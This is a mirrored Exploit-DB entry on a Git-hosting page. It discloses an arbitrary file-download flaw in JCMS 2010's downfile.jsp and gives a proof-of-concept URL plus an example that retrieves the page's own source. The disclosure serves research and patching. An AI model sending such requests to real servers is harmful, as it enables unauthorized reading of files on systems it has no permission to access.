bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/15596.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

22 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

#####################################################################################################
#Title: JCMS 2010 File Download Vulnerability
#Date: 2010-11-22
#Author: Beach
#Team: http://www.linux520.com/
#Vendor: http://www.hanweb.com/
#Language:Java
#Greetz: Brother
#####################################################################################################
[*]Description:
In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input
So this vulnerability allows an attacker to download any files .
#####################################################################################################
[*]POC:
http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]
#####################################################################################################
[*]I.E:
http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
#####################################################################################################
Reference in a new issue View git blame Copy permalink